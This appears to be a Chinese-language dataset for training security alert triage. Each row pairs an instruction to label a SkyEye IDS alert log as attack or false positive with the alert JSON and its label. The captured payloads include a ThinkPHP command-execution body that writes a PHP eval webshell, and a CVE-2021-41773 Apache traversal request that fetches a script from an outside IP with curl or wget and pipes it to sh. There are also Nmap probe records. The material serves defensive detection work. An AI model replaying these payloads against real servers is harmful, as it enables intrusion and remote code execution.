"HTTP/1.1", "uri": "/index.php?s=captcha", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x100215d7", "s": "captcha", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "45.64.52.160", "host_md5": "f6db9e52e2bff91b14ad1c771a76818d", "user-agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224", "referer": "http://www.hn.sgcc.cn/index.php?s=captcha", "vlan_id": "", "vuln_type": "通用命令执行漏洞", "attack_type": "命令执行", "is_web_attack": "1", "dip": "172.31.193.55", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请尽快排查受害主机上是否存在相关恶意程序并进行查杀,并修复系统漏洞。", "hit_start": "107", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvaW5kZXgucGhwP3M9Y2FwdGNoYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkFjY2VwdDogKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLWNuDQpDb29raWU6IFBIUFNFU1NJRD1nbmlnam1ramJ5aWNqeWdjaWx2YXVyYw0KUmVmZXJlcjogaHR0cDovL3d3dy5obi5zZ2NjLmNuL2luZGV4LnBocD9zPWNhcHRjaGENClVzZXItQWdlbnQ6IE1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzQuMDsgU0xDQzI7IC5ORVQgQ0xSIDIuMC41MDcyNzsgLk5FVCBDTFIgMy41LjMwNzI5OyAuTkVUIENMUiAzLjAuMzA3Mjk7IE1lZGlhIENlbnRlciBQQyA2LjA7IE1TLVJUQyBMTSA4OyBJbmZvUGF0aC4zOyAuTkVUNC4wQzsgLk5FVDQuMEUpIGNocm9tZWZyYW1lLzguMC41NTIuMjI0DQpDb250ZW50LUxlbmd0aDogMTQ0DQpIb3N0OiB3d3cuaG4uc2djYy5jbg0KDQo=", "req_body": "X21ldGhvZD1fX2NvbnN0cnVjdCZtZXRob2Q9R0VUJmZpbHRlcltdPXN5c3RlbSZnZXRbXT1lY2hvIFBEOXdhSEFnSUdWamFHOG9iV1ExS0Nkakp5a3BPMEJsZG1Gc0tDUmZVRTlUVkZzbmVpZGRLVHM3UHo0PSAgfCBiYXNlNjQgLWQgID4+cmZpaGoucGhw", "rsp_header": "", "rsp_body": ""}, "host": "www.hn.sgcc.cn", "host_state": "失败", "accept-language": "zh-cn", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_c80ae73db21bcaf538b354c8e96609b2", "access_time": "2024-11-27 10:09:17", "content-length": "144", "attack_addr": "中国--香港特别行政区--中国香港(22.350617/114.184921)", "type_chain": "16090000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "content-type": "application/x-www-form-urlencoded", "sip": "45.64.52.160", "dimension": "3", "url_path": "/index.php", "src_mac": "00:94:a1:5e:6e:87", "file_name": "index.php", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /index.php?s=captcha HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: */*\r\nAccept-Language: zh-cn\r\nCookie: PHPSESSID=gnigjmkjbyicjygcilvaurc\r\nReferer: http://www.hn.sgcc.cn/index.php?s=captcha\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224\r\nContent-Length: 144\r\nHost: www.hn.sgcc.cn\r\n\r\n", "req_body": "_method=__construct&method=GET&filter[]=system&get[]=echo PD9waHAgIGVjaG8obWQ1KCdjJykpO0BldmFsKCRfUE9TVFsneiddKTs7Pz4= | base64 -d >>rfihj.php", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268572119-通用命令执行漏洞", "rule_labels": "{\"0x110700\": {\"parent_name\": \"\", \"type\": \"\", \"name\": \"二次访问分析\", \"parent_id\": \"0\", \"info\": \"2.0.50727\", \"proto\": \"TCP\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"os\": \"Windows/7\", \"software\": \"Chrome Frame/8.0.552\", \"hw_type\": \"PC\"}}", "sport": "51916", "h_url": "/index.php?s=captcha"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673312", "vlan_id": "", "vuln_type": "发现黑客工具Nmap扫描行为", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.55", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732673312, "vuln_harm": "攻击者可通过Nmap获悉目标端口的状态及端口上运行服务的详细信息,并针对开启的端口进行攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.55", "site_app": "", "hit_end": 97, "uri": "/nmaplowercheck1732673168", "dport": 80, "vuln_name": "发现黑客工具Nmap扫描行为", "rsp_status": 0, "code_language": "", "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵。", "hit_start": 77, "detail_info": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "xff": "", "sip": "101.34.63.213", "vuln_desc": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "public_date": "2023-03-17 16:10:21", "sport": 50862}, "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵。", "hit_start": "77", "skyeye_id": "", "payload": {"req_header": "R0VUIC9ubWFwbG93ZXJjaGVjazE3MzI2NzMxNjggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBObWFwIFNjcmlwdGluZyBFbmdpbmU7IGh0dHBzOi8vbm1hcC5vcmcvYm9vay9uc2UuaHRtbCkNCkhvc3Q6IDIxOC43Ni4xNS4xMA0KQ29ubmVjdGlvbjogY2xvc2UNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "file_md5": "", "host": "218.76.15.10", "host_state": "失败", "rule_key": "webids", "connection": "close", "api": "218.76.15.10/nmaplowercheck1732673168", "first_access_time": "2024-11-27 10:08:32", "hazard_level": "4", "hazard_rating": "中危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "中国", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现黑客工具Nmap扫描行为", "alarm_sip": "172.31.193.55", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "cd32e2a81434da33458a7255dd2fbdcd", "proto": "http", "xff": "", "alarm_id": "20241127_dda85174371893d0adc4a59186dd37d7", "vuln_desc": "Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统(这是亦称 fingerprinting)。它是网络管理员必用的软件之一,以及用以评估网络系统安全。正如大多数被用于网络安全的工具,Nmap 也是不少黑客及骇客(又称脚本小子)爱用的工具 。系统管理员可以利用nmap来探测工作环境中未经批准使用的服务器,但是黑客会利用nmap来搜集目标电脑的网络设定,从而计划攻击的方法。Nmap 常被跟评估系统漏洞软件Nessus 混为一谈。Nmap 以隐秘的手法,避开闯入检测系统的监视,并尽可能不影响目标系统的日常操作。", "attack_chain": "0x01010000", "access_time": "2024-11-27 10:08:32", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "140E0000", "vuln_harm": "攻击者可通过Nmap获悉目标端口的状态及端口上运行服务的详细信息,并针对开启的端口进行攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732673291", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "101.34.63.213", "public_date": "2023-03-17 16:10:21", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/nmaplowercheck1732673168", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "97", "h_proto_version": "HTTP/1.1", "serial_num": "QbJK/8ze/", "uri": "/nmaplowercheck1732673168", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x1002057c", "req_header": "GET /nmaplowercheck1732673168 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)\r\nHost: 218.76.15.10\r\nConnection: close\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.34.63.213", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567932-发现黑客工具Nmap扫描行为", "rule_labels": "{\"0x100809\": {\"parent_id\": \"0x100800\", \"type\": \"扫描器名称\", \"name\": \"Nmap\", \"parent_name\": \"Web漏洞扫描\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "host_md5": "261f45f0acd69bc44c8fdeed8c4281bc", "sport": "50862", "h_url": "/nmaplowercheck1732673168", "user-agent": "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732673185", "vlan_id": "", "vuln_type": "发现NMAP探测行为(SSL)", "attack_type": "信息泄露", "dip_group": "未分配资产组", "is_web_attack": "0", "nid": "", "dip": "172.23.69.174", "sip_group": "", "repeat_count": "1", "type": "信息泄露", "skyeye_type": "webids-ids_dolog", "_origin": {"write_date": 1732673185, "rule_name": "发现NMAP探测行为(SSL)", "hit_field": "", "description": "1", "dip": "172.23.69.174", "protocol_id": 6, "hit_end": 163, "uri": "", "cnnvd_id": "", "dport": 20080, "rule_version": "3.0.1122.14572", "hit_start": 143, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "packet_size": 164, "appid": 19, "proto": "ssl", "xff": "", "sip": "101.34.63.213", "attack_method": "远程", "affected_system": "", "sig_id": 2539, "sport": 52052, "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"}, "hit_start": "143", "skyeye_id": "", "payload": {"packet_data": "ACSs3Z37AJShXm6HCABFoACW7fNAADIGwxFlIj/VrBdFrstUTnCAw5uJ364XJlAYAfZSAwAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI="}, "detail_info": "发现主机或服务器信息探测行为。类似Nmap这样的扫描器正在探测主机或服务器的存活状态、操作系统版本等信息。攻击者通过收集此类信息,以实施进一步攻击。", "file_md5": "", "host": "", "host_state": "企图", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 10:06:25", "hazard_level": "4", "hazard_rating": "中危", "rule_name": "发现NMAP探测行为(SSL)", "packet_data": "ACSs3Z37AJShXm6HCABFoACW7fNAADIGwxFlIj/VrBdFrstUTnCAw5uJ364XJlAYAfZSAwAAFgMAAGkBAABlAwNVHKfkcmFuZG9tMXJhbmRvbTJyYW5kb20zcmFuZG9tNAAADAAvAAoAEwA5AAQA/wEAADAADQAsACoAAQADAAIGAQYDBgICAQIDAgIDAQMDAwIEAQQDBAIBAQEDAQIFAQUDBQI=", "hit_field": "", "sip_addr": "中国", "protocol_id": "6", "cnnvd_id": "", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "alarm_sip": "172.23.69.174", "rule_desc": "网络攻击", "rule_version": "3.0.1122.14572", "skyeye_index": "", "sip_ioc_dip": "ced83b776e2d153c7047d0f3084e98d5", "proto": "ssl", "xff": "", "alarm_id": "20241127_78b19f8c777729b5ebe32a5621f8b70c", "attack_chain": "0x01050000", "access_time": "2024-11-27 10:06:25", "attack_addr": "中国(39.902798/116.401159)", "type_chain": "16160000", "description": "1", "dip_addr": "局域网", "dport": "20080", "alert_devip": "172.31.191.57", "rsp_status": "", "update_time": "1732673166", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "101.34.63.213", "attack_method": "远程", "affected_system": "", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "src_mac": "00:94:a1:5e:6e:87", "confidence": "中", "super_type": "攻击利用", "super_attack_chain": "0x01000000", "hit_end": "163", "serial_num": "QbJK/8ze/", "uri": "", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x59b6", "attack_org": "", "is_white": "0", "packet_size": "164", "alarm_sample": "1", "appid": "19", "attack_sip": "101.34.63.213", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "22966-发现NMAP探测行为(SSL)", "rule_labels": "{}", "sig_id": "2539", "host_md5": "", "sport": "52052", "bulletin": "排查来源IP是否是攻击者,如果是,建议封禁该IP。"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732672214", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732672214, "vuln_harm": "当WEB服务路境外的文件未被设置为“Require all denied”时,攻击者可利用该漏洞读取任意系统文件。当服务器启用了Mod_CGI模块时,攻击者可利用该漏洞调用任意系统二进制文件,包括远程执行系统命令。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "", "hit_end": 28, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "rsp_status": 0, "code_language": "", "solution": "由于该版本的后续版本 2.4.50 存在该漏洞未完全修复导致的新漏洞,故需更新系统至 2.4.51 及以后版本。", "hit_start": 8, "detail_info": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "xff": "", "sip": "101.47.73.76", "vuln_desc": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "public_date": "2021-11-15 10:39:08", "sport": 38326}, "detail_info": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.16:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 09:50:14", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--广东省--广州市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "alarm_sip": "172.31.193.222", "skyeye_index": "", "sip_ioc_dip": "f5f74cd7a1c63c6557ad87a9c3d691e4", "xff": "", "vuln_desc": "Apache HTTP Server 2.4.49 版本中存在路径穿越漏洞,该漏洞源于程序仅处理了直接的“../”路径而没有正确处理“.%2e/”,该路径进入后续的处理导致路径穿越漏洞。而后经过进一步研究发现,当服务器启用了Mod_CGI模块时,该漏洞可被进一步用于远程命令执行。", "attack_chain": "0x02020000", "vuln_harm": "当WEB服务路境外的文件未被设置为“Require all denied”时,攻击者可利用该漏洞读取任意系统文件。当服务器启用了Mod_CGI模块时,攻击者可利用该漏洞调用任意系统二进制文件,包括远程执行系统命令。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732672192", "code_language": "", "public_date": "2021-11-15 10:39:08", "skyeye_serial_num": "QbJK/8ze/", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "28", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020e07", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.47.73.76", "host_md5": "dc31e34f985c6c605c86e0f909e8eebe", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.31.193.222", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "由于该版本的后续版本 2.4.50 存在该漏洞未完全修复导致的新漏洞,故需更新系统至 2.4.51 及以后版本。", "hit_start": "8", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.16:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_f47b085a868ac8c73b1f80c3be8bf8a2", "access_time": "2024-11-27 09:50:14", "content-length": "103", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "101.47.73.76", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.16:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268570119-Apache HTTP Server 路径穿越/远程命令执行漏洞(CVE-2021-41773)", "rule_labels": "{\"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"hw_type\": \"PC\"}}", "sport": "38326", "h_url": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732672214", "rule_version_str": "3.0.1122.14572", "dip_group": "未分配资产组", "nid": "", "sip_group": "", "type": "目录遍历", "_origin": {"write_date": 1732672214, "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.222", "site_app": "通用", "hit_end": 253, "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dport": 80, "vuln_name": "发现目录穿越攻击行为", "rsp_status": 0, "code_language": "通用", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": 233, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "xff": "", "sip": "101.47.73.76", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "public_date": "2018-08-16 18:57:22", "sport": 38326}, "detail_info": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "218.76.15.16:80/cgi-bin/../../../../../../../../../../bin/sh", "first_access_time": "2024-11-27 09:50:14", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "h_method": "POST", "sip_addr": "中国--广东省--广州市", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现目录穿越攻击行为", "alarm_sip": "172.31.193.222", "skyeye_index": "", "sip_ioc_dip": "3ce4098b322b5609dc994c338b417fde", "xff": "", "vuln_desc": "目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令", "attack_chain": "0x02010000", "vuln_harm": "1.程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。\r\n2.目录遍历攻击可使攻击者越权直接查看整个网站的目录结构及文件,并且可能利用此类型攻击跨目录上传下载服务器中敏感文件。", "dport": "80", "alert_devip": "172.31.191.57", "update_time": "1732672192", "code_language": "通用", "public_date": "2018-08-16 18:57:22", "skyeye_serial_num": "QbJK/8ze/", "site_app": "通用", "super_attack_chain": "0x02000000", "hit_end": "253", "h_proto_version": "HTTP/1.1", "uri": "/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x1002055d", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "101.47.73.76", "host_md5": "dc31e34f985c6c605c86e0f909e8eebe", "user-agent": "Custom-AsyncHttpClient", "vlan_id": "", "vuln_type": "发现目录穿越攻击行为", "attack_type": "目录遍历", "is_web_attack": "1", "dip": "172.31.193.222", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "1.对用户的输入进行验证,特别是路径替代目录跳转符\r\n2.尽可能采用白名单的形式,验证所有输入\r\n3.合理配置web服务器的目录权限", "hit_start": "233", "skyeye_id": "", "payload": {"req_header": "UE9TVCAvY2dpLWJpbi8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlLy4lMmUvLiUyZS8uJTJlL2Jpbi9zaCBIVFRQLzEuMQ0KSG9zdDogMjE4Ljc2LjE1LjE2OjgwDQpBY2NlcHQ6ICovKg0KVXBncmFkZS1JbnNlY3VyZS1SZXF1ZXN0czogMQ0KVXNlci1BZ2VudDogQ3VzdG9tLUFzeW5jSHR0cENsaWVudA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb250ZW50LUxlbmd0aDogMTAzDQoNCg==", "req_body": "WD0kKGN1cmwgaHR0cDovLzQ1LjIwMi4zNS4xOTAvc2ggfHwgd2dldCBodHRwOi8vNDUuMjAyLjM1LjE5MC9zaCAtTy0pOyBlY2hvICIkWCIgfCBzaCAtcyBhcGFjaGUuc2VsZnJlcA==", "rsp_header": "", "rsp_body": ""}, "host": "218.76.15.16:80", "host_state": "失败", "rsp_body": "", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_76bc48e77f4b891956b0b4a9fbf56c8f", "access_time": "2024-11-27 09:50:14", "content-length": "103", "attack_addr": "中国--广东省--广州市(23.116548/113.295827)", "type_chain": "160B0000", "dip_addr": "局域网", "rsp_status": "0", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "content-type": "text/plain", "sip": "101.47.73.76", "dimension": "3", "url_path": "/cgi-bin/../../../../../../../../../../bin/sh", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "攻击利用", "serial_num": "QbJK/8ze/", "tcp_option": "", "req_header": "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1\r\nHost: 218.76.15.16:80\r\nAccept: */*\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Custom-AsyncHttpClient\r\nConnection: keep-alive\r\nContent-Type: text/plain\r\nContent-Length: 103\r\n\r\n", "req_body": "X=$(curl http://45.202.35.190/sh || wget http://45.202.35.190/sh -O-); echo \"$X\" | sh -s apache.selfrep", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567901-发现目录穿越攻击行为", "rule_labels": 